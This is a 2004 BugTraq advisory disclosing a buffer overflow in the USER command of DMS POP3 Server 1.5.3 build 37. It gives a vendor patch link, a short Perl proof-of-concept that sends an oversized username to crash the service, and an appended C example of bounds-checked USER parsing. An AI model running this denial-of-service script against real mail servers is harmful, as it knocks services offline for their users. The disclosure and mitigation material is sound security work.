BugTraq
Buffer overflow in DMS POP3 Server for Windows 2000/XP 1.5.3 build 37 and prior versions.
Nov 18 2004 06:43PM
Reed Arvin (reedarvin gmail com)


Summary:

A buffer overflow exists in DMS POP3 Server for Windows 2000/XP 1.5.3 build 37 (http://www.digitalmapping.sk.ca/pop3srv/default.asp) and prior versions.

Details:

A buffer overflow occurs during the POP3 authentication process when an overly long username is supplied. When the username buffer is overflowed successfully, the DMS POP3 Service dies, resulting in a denial of service.

Vulnerable Versions:

DMS POP3 Server for Windows 2000/XP 1.5.3 build 37 and prior versions

Solutions:

The vendor has provided a patch to fix this issue:

http://www.digitalmapping.sk.ca/pop3srv/Update.asp

Exploit:

#===== Start DMS_POP3_Overflow.pl =====
#
# Usage: DMS_POP3_Overflow.pl <ip> <port>
# DMS_POP3_Overflow.pl 127.0.0.1 110
#
# DMS POP3 Server for Windows 2000/XP 1.5.3 build 37
#
# Download:
# http://www.digitalmapping.sk.ca/pop3srv/default.asp
#
# Patch:
# http://www.digitalmapping.sk.ca/pop3srv/Update.asp
#
#####################################################

use IO::Socket;
use strict;

my($socket) = "";

if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                                    PeerPort => $ARGV[1],
                                    Proto    => "TCP"))
{
    print "Attempting to kill DMS POP3 service at $ARGV[0]:$ARGV[1]...";
    sleep(1);
    print $socket "USER " . "A" x 1023;
    close $socket;
    sleep(1);

    if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                                        PeerPort => $ARGV[1],
                                        Proto    => "TCP"))
    {
        close $socket;
        print "failed!\n";
    }
    else
    {
        print "successful!\n";
    }
}
else
{
    print "Cannot connect to $ARGV[0]:$ARGV[1]\n";
}

#===== End DMS_POP3_Overflow.pl =====

Discovered by Reed Arvin reedarvin[at]gmail[dot]com
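
Added example (not part of the original advisory, and not the vendor's code or patch): a bounds-checked parser for the POP3 USER line, showing the length checks whose absence produces the overflow described under Details. The function name, status codes and buffer sizes are assumptions; the 40-character argument limit comes from RFC 1939 and the 255-octet line limit from RFC 2449.

```c
#include <ctype.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define POP3_MAX_LINE 255 /* RFC 2449: command line limit, CRLF included */
#define POP3_MAX_ARG   40 /* RFC 1939: maximum length of one argument */

enum user_status { USER_OK, USER_NOT_USER, USER_EMPTY, USER_TOO_LONG };

/* Parse "USER <name>[CRLF]" from a received buffer of len bytes (not
 * NUL-terminated). The name is copied into out only after every length
 * check has passed; on any error out is left untouched. */
enum user_status parse_user(const char *line, size_t len,
                            char *out, size_t out_size)
{
    static const char kw[] = "USER ";
    size_t i, arg_len;

    if (len > POP3_MAX_LINE)            /* reject before touching the data */
        return USER_TOO_LONG;
    while (len > 0 && (line[len - 1] == '\r' || line[len - 1] == '\n'))
        len--;                          /* drop the line terminator */
    if (len < 5)
        return USER_NOT_USER;
    for (i = 0; i < 5; i++)             /* keywords are case-insensitive */
        if (toupper((unsigned char)line[i]) != kw[i])
            return USER_NOT_USER;
    arg_len = len - 5;
    if (arg_len == 0)
        return USER_EMPTY;
    if (arg_len > POP3_MAX_ARG || arg_len >= out_size)
        return USER_TOO_LONG;           /* never truncate silently */
    memcpy(out, line + 5, arg_len);
    out[arg_len] = '\0';
    return USER_OK;
}

int main(void)
{
    char name[POP3_MAX_ARG + 1];
    char big[5 + 1023];                 /* constructed: 1023-byte username */

    memcpy(big, "USER ", 5);
    memset(big + 5, 'A', 1023);
    printf("long:  %d\n", parse_user(big, sizeof big, name, sizeof name));
    printf("short: %d\n", parse_user("USER alice\r\n", 12, name, sizeof name));
    return 0;
}
```

A server using a check like this would answer an oversized USER line with -ERR and keep the session state unchanged instead of copying the argument into a fixed buffer.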
